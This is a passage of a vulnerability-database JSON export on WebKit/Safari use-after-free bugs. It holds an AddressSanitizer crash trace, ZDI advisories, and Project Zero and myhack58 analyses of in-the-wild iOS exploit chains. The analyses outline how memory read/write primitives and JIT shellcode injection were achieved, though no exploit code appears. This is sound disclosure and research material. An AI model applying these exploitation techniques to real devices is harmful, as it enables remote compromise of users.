0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d) \n#55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa) \n#56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd) \n#57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) \n#58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) \n#59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) \n#60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) \n \n0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8) \nfreed by thread T0 here: \n#0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) \n#1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30) \n#2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83) \n#3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892) \n#4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d) \n#5 0x111fb4b99 in 
WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99) \n#6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d) \n#7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83) \n#8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892) \n#9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d) \n#10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118) \n#11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, 
(JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f) \n#12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2) \n#13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd) \n#14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c) \n#15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d) \n#16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74) \n#17 0x11ea488c9 in 
JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9) \n#18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da) \n#19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9) \n#20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724) \n#21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b) \n#22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439) \n#23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d) \n#24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, 
WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8) \n#25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe) \n#26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b) \n#27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040) \n#28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3) \n#29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476) \n \npreviously allocated by thread T0 here: \n#0 0x10f544d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) \n#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) \n#2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4) \n#3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d) \n#4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437) \n#5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768) \n#6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08) \n#7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d) \n#8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3) \n#9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4) \n#10 0x111e8aac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9) \n#11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17) \n#12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504) \n#13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4) \n#14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43) \n#15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e) \n#16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba) \n#17 0x111eb7779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779) \n#18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6) \n#19 0x111eb842e in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e) \n#20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351) \n#21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d) \n#22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) \n#23 0x11142f997 in WebCore::CachedResource::checkNotify() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) \n#24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) \n#25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) \n#26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) \n#27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) \n#28 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) \n#29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) \n \nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1343a) in WebCore::Node::nextSibling() const \nShadow bytes around the buggy address: \n0x1c1800016db0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa \n0x1c1800016dc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd \n0x1c1800016dd0: fa fa fa fa fa fa fa fa fd fd fd 
fd fd fd fd fd \n0x1c1800016de0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa \n0x1c1800016df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd \n=>0x1c1800016e00: fa fa fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd \n0x1c1800016e10: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa \n0x1c1800016e20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd \n0x1c1800016e30: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 \n0x1c1800016e40: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa \n0x1c1800016e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nFreed heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nContainer overflow: fc \nArray cookie: ac \nIntra object redzone: bb \nASan internal: fe \nLeft alloca redzone: ca \nRight alloca redzone: cb \n==29516==ABORTING \n================================================================= \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: ifratric \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/143483/GS20170725050029.txt"}], "zdi": [{"lastseen": "2020-06-22T11:40:50", "bulletinFamily": "info", "cvelist": ["CVE-2017-2538"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 
The specific flaw exists within the handling of cached stylesheets. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2017-06-22T00:00:00", "published": "2017-05-18T00:00:00", "id": "ZDI-17-362", "href": "https://www.zerodayinitiative.com/advisories/ZDI-17-362/", "title": "(Pwn2Own) Apple Safari ProcessingInstruction Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:41:37", "bulletinFamily": "info", "cvelist": ["CVE-2017-7052"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Frame objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. 
An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2017-06-22T00:00:00", "published": "2017-07-19T00:00:00", "id": "ZDI-17-489", "href": "https://www.zerodayinitiative.com/advisories/ZDI-17-489/", "title": "Apple Safari Frame Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2019-09-17T10:34:08", "bulletinFamily": "info", "cvelist": ["CVE-2019-8518", "CVE-2017-7064", "CVE-2018-4438", "CVE-2017-2505", "CVE-2018-17463", "CVE-2018-4122"], "description": "In this article, we analyse the WebKit exploits that were used to gain an initial foothold on the iOS device and to stage the privilege-escalation exploits. All of them achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. Although Chrome on iOS would also have been vulnerable to these browser bugs, the attackers only used them to target Safari and iPhones. \nThis article first gives a short walkthrough of each exploited WebKit vulnerability and of how the attackers built a memory read/write primitive from it, then outlines the techniques used to gain shellcode execution and to bypass the existing JIT code-injection mitigations. \nNotably, none of the exploits bypass the PAC-based JIT hardening that is enabled on A12 devices. The writeups are ordered by the most recent iOS version each exploit supports, as indicated by the version check in the exploit code; where that check is missing, the supported range was guessed from the date of the fix and from the preceding exploits. \nThe renderer exploits first gain a memory read/write capability, then inject shellcode into the JIT region to obtain native code execution. Every time a new exploitable bug became available, it was exploited for read/write and then plugged into the existing exploit framework. The exploits also rely on common exploitation techniques, for example first building the addrof and fakeobj primitives and then faking JS objects to achieve read/write. \nFor many of the exploits it is unclear whether they were used as 0day or as 1day after the fix had shipped, and it is unknown how the attackers obtained knowledge of the vulnerabilities in the first place. Generally they could have found the bugs themselves or used public exploits released after a fix had shipped. WebKit publishes vulnerability details before the fixed version reaches users. CVE-2019-8518 was fixed in WebKit HEAD on February 9, 2019 with commit 4a23c92e6883. That commit contains a test case which triggers the vulnerability and results in an out-of-bounds access on a JSArray, a condition that is usually very easy to exploit. However, the fix only reached users with iOS 12.2 on March 25, 2019, about a month and a half after the vulnerability details became public. A technically capable attacker could replace the underlying bug within a few days and keep exploiting the latest devices without finding new bugs themselves. This may have happened for at least some of the vulnerabilities below. \nFor comparison, this is how the other browser vendors handle this patch-gap problem: \nGoogle and Chromium have the same problem, for example commit 52a9e67a477b fixes CVE-2018-17463. However, some recent fixes no longer appear to include the JavaScript test case; for example, the fixes for the two bugs reported by our team member Sergey Glazunov, aa00ee22f8f7 for issue 1784 and 4edcc8605461 for issue 1793. \nMicrosoft keeps security fixes to the open-source Chakra engine confidential until the fix has shipped to users, then releases the patch together with the CVE number; see commit 7f0d390ad77d for an example. Note, however, that Chakra is about to be replaced in Edge by V8 (Chromium's JavaScript engine). \nMozilla does not push security fixes to its public repository at all until the next release ships, and it does not disclose the JavaScript test cases that trigger a vulnerability. \nIt is worth noting, however, that even without a JavaScript test case, the code patch alone is usually enough to write a PoC and eventually an exploit for the vulnerability. \n\n0x01 Exploit 1: iOS 10.0 to 10.3.2 \nThis exploit targets CVE-2017-2505, originally reported by lokihardt as Project Zero issue 1137 and fixed in WebKit HEAD with commit 4a23c92e6883 on March 11, 2017. The fix shipped to users on May 15 in iOS 10.3.2. Interestingly, the in-the-wild exploit is almost identical to the bug report and to the test file in the WebKit repository. In the image below, the left side shows the test published in the WebKit code repository and the right side shows the part of the in-the-wild exploit that triggers the vulnerability. \n![](/Article/UploadPic/2019-9/2019917134229760.png) \nThe vulnerability leads to an out-of-bounds write of controlled data on the JSC heap. The attacker corrupts the first QWord of a controlled JSObject, changing its structure ID (the run-time type information associated with a JSCell) so that the object appears to be a Uint32Array. This creates a fake TypedArray, which directly gives them a memory read/write primitive. \n\n0x02 Exploit 2: iOS 10.3 to 10.3.3 \nThis exploit targets CVE-2017-7064 or a variant of it, which was originally found by lokihardt and reported as issue 1236. The vulnerability was fixed in WebKit HEAD with commit ad6d74945b13 on April 18, 2017 and shipped to users on July 19, 2017 in iOS 10.3.3. The bug causes uninitialized memory to be treated as the contents of a JS array. With heap-grooming techniques the uninitialized data can be controlled; a type confusion between doubles and JSValues then yields the addrof and fakeobj primitives, and a forged TypedArray again provides memory read/write. \n\n0x03 Exploit 3: iOS 11.0 to 11.3 \nThis exploit targets WebKit bug 181867, probably CVE-2018-4122. It was fixed in WebKit HEAD on January 19, 2018 and shipped to users on March 29, 2018 in iOS 11.3. The vulnerability is a typical JIT side-effect issue. It is unclear how the attacker learned of this vulnerability in early 2018. The exploit uses the bug to confuse double and JSValue array representations, builds the addrof and fakeobj primitives from that, and again forges a typed array object to obtain memory read/write. \n\n0x04 Exploit 4: iOS 11.3 to 11.4.1 \nThis exploit targets the vulnerability fixed by commit b4e567d371fd on May 16, 2018, which corresponds to WebKit bug 185694. Unfortunately we could not determine the CVE assigned to this issue, but the patch appears to have shipped to users on July 9, 2018 in iOS 11.4.1. This is another JIT side-effect issue, similar to the previous one, and again a fakeobj primitive is built to forge a JS object. By this time, however, the Gigacage mitigation had shipped, so forging ArrayBuffers / TypedArrays was no longer useful on its own. \nThe exploit therefore constructs a fake unboxed double Array to obtain an initial, limited memory read/write primitive, uses that primitive to disable the Gigacage mitigation, and then continues with TypedArrays for the rest of the exploit. \n\n0x05 Exploit 5: iOS 11.4.1 \nThis exploit targets CVE-2018-4438, reported by lokihardt as issue 1649. The vulnerability was fixed with commit 8deb8bd96f4a on October 26, 2018 and shipped to users on December 5, 2018 in iOS 12.1.1. The bug allows constructing an array whose prototype is a Proxy; by triggering it from JIT-compiled code, the vulnerability is turned into a JIT side-effect issue. The exploit closely resembles the previous one: a limited read/write through a JS array is first used to disable the Gigacage mitigation, then TypedArrays provide the full read/write used to inject the shellcode. \n\n\n**[1] [[2]](<96030_2.htm>) [next](<96030_2.htm>)**\n", "edition": 1, "modified": "2019-09-17T00:00:00", "published": "2019-09-17T00:00:00", "id": "MYHACK58:62201996030", "href": "http://www.myhack58.com/Article/html/3/62/2019/96030.htm", "title": "In-depth exploration found in the wild iOS exploit chain VI-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:04", "bulletinFamily": "info", "cvelist": ["CVE-2017-2505", "CVE-2017-7064", "CVE-2018-17463", "CVE-2018-4122", "CVE-2018-4438", "CVE-2018-4442", "CVE-2019-6217", "CVE-2019-8518", "CVE-2019-8646"], "description": "Posted by Samuel Gro\u00df, Project Zero\n\n** \n** \n\n\nIn this post, we will take a look at the WebKit exploits used to gain an initial foothold onto the iOS device and stage the privilege escalation exploits. All exploits here achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. 
Although Chrome on iOS would have also been vulnerable to these initial browser exploits, they were only used by the attacker to target Safari and iPhones. \n \nAfter some general discussion, this post first provides a short walkthrough of each of the exploited WebKit bugs and how the attackers construct a memory read/write primitive from them, followed by an overview of the techniques used to gain shellcode execution and how they bypassed existing JIT code injection mitigations, namely the \u201cbulletproof JIT\u201d. \n \nIt is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices. The exploit writeups are sorted by the most recent iOS version the exploit supports as indicated by a version check in the exploit code itself. If that version check was missing from the exploit, the supported version range was guessed based on the date of the fix and the previous exploits. \n \nThe renderer exploits follow common practice and first gain memory read/write capabilities, then inject shellcode into the JIT region to gain native code execution. In general it seems that every time a new bug was necessary/available, the new bug was exploited for read/write and then plugged into the existing exploit framework. The exploits for the different bugs also appear to generally use common exploit techniques, e.g. by first creating [the addrof and fakeobj primitives](<http://www.phrack.org/papers/attacking_javascript_engines.html>), then faking JS objects to achieve read/write. \n \nFor many of the exploits it is unclear whether they were originally exploited as 0day or as 1day after a fix had already shipped. It is also unknown how the attackers obtained knowledge of the vulnerabilities in the first place. Generally they could have discovered the vulnerabilities themselves or used public exploits released after a fix had shipped. 
Furthermore, at least for WebKit, it is often possible to extract details of a vulnerability from the public source code repository before the fix has been shipped to users. [CVE-2019-8518](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1775>) can be used to highlight this problem (as can many other recent vulnerabilities). The vulnerability was publicly fixed in WebKit HEAD on Feb 9 2019 with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>). This commit contains a testcase that triggers the issue and causes an out-of-bounds access into a JSArray - a scenario that is usually easy to exploit. However, the fix only shipped to users with the release of iOS 12.2 on March 25 2019, roughly one and a half months after details about the vulnerability were public. An attacker in possession of a working exploit for an older WebKit vulnerability would likely only need a few days to replace the underlying vulnerability and thus gain the capability to exploit up-to-date devices without the need to find new vulnerabilities themselves. It is likely that this happened for at least some of the following exploits. \n \nFor comparison, here is how other browser vendors deal with this \u201cpatch-gap\u201d or vulnerability window problem:\n\n * Google has this same problem with Chromium (e.g. commit [52a9e67a477b](<https://chromium.googlesource.com/v8/v8.git/+/52a9e67a477bdb67ca893c25c145ef5191976220>) fixing [CVE-2018-17463](<http://www.phrack.org/papers/jit_exploitation.html>) and including a PoC trigger). However, it appears that some recent bugfixes no longer include the JavaScript test cases commits. 
